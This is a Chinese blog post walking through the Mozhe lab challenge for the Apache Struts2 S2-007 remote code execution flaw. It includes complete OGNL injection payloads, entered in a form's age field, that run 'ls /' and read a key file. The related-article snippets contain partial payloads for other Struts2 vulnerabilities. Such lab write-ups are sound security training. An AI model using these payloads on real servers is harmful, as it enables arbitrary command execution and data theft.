墨者Apache Struts2远程代码执行漏洞(S2-007)复现题解

最新推荐文章于 2023-07-27 14:00:08 发布
最新推荐文章于 2023-07-27 14:00:08 发布
阅读量976 收藏 1
点赞数
分类专栏: 做题记录 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zr1213159840/article/details/122372141
版权

用户邮箱随便输,然后在年龄那一栏填入’+(1+1)+’,点击登录,能发现回显了11
在这里插入图片描述

在这里插入图片描述
接着利用以下代码,ls查看有哪些文件
'+ (#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java.lang.Boolean(“false”),#context[“xwork.MethodAccessor.denyMethodExecution”]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ls /’).getInputStream())) + ’

在这里插入图片描述
能看到key.txt,直接利用上述代码读取这个key.txt。
'+ (#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java.lang.Boolean(“false”),#context[“xwork.MethodAccessor.denyMethodExecution”]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘cat /key.txt’).getInputStream())) + ’
在这里插入图片描述

铁锤2号
关注
专栏目录
墨者学院-Apache Struts2远程代码执行漏洞(S2-015)复现
JimWu的博客
09-04 2042
Apache Struts2远程代码执行漏洞(S2-015)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 如果一个请求与任何其他定义的操作不匹配,它将被匹配,*并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。 1.打开靶场,测试是否存在漏洞。 输入/${1+1}.action...
墨者靶场 Apache Struts2远程代码执行漏洞(S2-013)复现
曹振国的博客
06-17 331
漏洞详情: 关于漏洞详情可以查看这篇文章:S2-013 struts2的标签中 <s:a> 和 <s:url> 都有一个 includeParams 属性,可以设置成如下值: 1. none - URL中不包含任何参数(默认) 2. get - 仅包含URL中的GET参数 3. all - 在URL中包含GET和POST参数 当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。 此时<s:a> 或<s:ur
墨者学院-Apache Struts2远程代码执行漏洞(S2-007)复现
JimWu的博客
09-04 831
Apache Struts2远程代码执行漏洞(S2-007)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 当提交表单中变量的类型出现错误时,进行了错误的字符串拼接,后端会执行OGNL表达式。 1.打开靶场,了解S2-007漏洞是当提交表单中变量的类型出现错误时,进行了错误的字符串拼接,后端会执行OGNL表达式。 2.测试一下哪个输入框存在漏洞。 最下的输...
【CVE-2022-26134】Confluence OGNL RCE 漏洞
weixin_45742777的博客
09-09 7966
【CVE-2022-26134】Confluence OGNL RCE 漏洞
Confluence OGNL表达式注入命令执行漏洞(CVE-2022-26134)vulhub漏洞复现
qq_53003652的博客
07-18 318
Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在利用的代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。进入安装页面,申请试用版许可证。在填写数据库信息的页面,PostgreSQL数据库地址为。PostgreSQL数据库地址为。,burpsuite抓包。
墨者Apache Struts2远程代码执行漏洞(S2-029)复现题解
zr1213159840的博客
01-15 446
首先打开页面,能看到有个让提交东西的框,通过代码能看到,这个框我们没法填入东西,所以自然而然的想法是在链接中直接添加 通过在网上寻找poc,我们可以使用如下poc ?message=(#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptPropertie
s2 007 漏洞分析
王嘟嘟的博客
05-24 1309
把笔记上的东西摘录过来。记录一下s2 007的相关内容。一是记录,二是方便复习。
墨者学院-Apache Struts2远程代码执行漏洞(S2-016)复现
JimWu的博客
09-04 1805
Apache Struts2远程代码执行漏洞(S2-016)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。 1.打开靶场,尝试访问/index.action。 证明存在该页面。 2.测试一下是否存在漏洞输入/index.action?redirect:%...
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-013)复现
weixin_42079912的博客
08-09 545
S2-013漏洞原理:struts2的标签中 < s:a > 和 < s:url > 都有一个 includeParams 属性,可以设置成值none或get或all ,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。此时< s:a > 或< s:url >尝试去解析原始请求参数时,会导致OG...
墨者学院-Apache Struts2远程代码执行漏洞(S2-019)复现
JimWu的博客
09-04 1158
Apache Struts2远程代码执行漏洞(S2-019)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理:默认情况下禁用动态方法调用导致的命令执行。 1.打开靶场,搜索一下S2-019漏洞原理。 2.构造POC,执行命令ls查看文件。 进行url二次编码。 ?debug=command&expression=%23f%3D%23_memberAcces...
墨者struts知识点
最新发布
wswr的博客
07-27 480
墨者struts靶场的练习知识点
CVE-2022-26134 Confluence远程命令执行漏洞复现
weixin_48421613的博客
06-05 6381
CVE-2022-26134 Confluence远程命令执行漏洞复现
java.lang.NoSuchMethodError: org.apache.commons.io.IOUtils.toString
zxc.blog
07-13 5505
加载了低版本jar包,jar包冲突,依赖相同的jar包,去掉不需要的依赖,或将冲突jar包换为新版本。
org.apache.commons.io.IOUtils工具类快速读取文件内容
热门推荐
huangbaokang的博客
11-30 3万+
apache.commons模块已经封装了快速读取文件内容的工具类IOUtils,在项目中可以直接使用,非常方便!1:添加依赖jar包,我用的是commons-io-2.4.jar2:编写测试类package com.hbk.test;import java.io.InputStream;import org.apache.commons.io.IOUtils;public class Common
Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134)复现
weixin_42489549的博客
06-29 8923
CVE-2022-26134 Confluence远程命令执行漏洞复现
struts2 的几个远程代码执行漏洞
zwjhuhu的专栏
06-28 2167
主要收集自网络 http://zone.wooyun.org/content/3880 来源: http://ahack.iteye.com/blog/1858871 http://ahack.iteye.com/blog/1873005 检测是否存在: 可能使用的代码 POC1: http://127.0.0.1/Struts2/test.action?('\43
java struts2 漏洞_Struts2漏洞利用
weixin_34837898的博客
02-13 751
Struts漏洞合集Struts-S2-013漏洞利用受影响版本Struts 2.0.0 - Struts 2.3.14.1漏洞利用任意命令执行POC:${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java...
Apache Struts2远程代码执行漏洞(S2-029)复现
qq_36933272的博客
09-03 1585
打开源代码,发现传递信息的参数是message 查找S-2-029的poc,(#_memberAccess[‘allowPrivateAccess’]=true,#_memberAccess[‘allowProtectedAccess’]=true,#_memberAccess[‘excludedPackageNamePatterns’]=#_memberAccess[‘acceptPropert...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值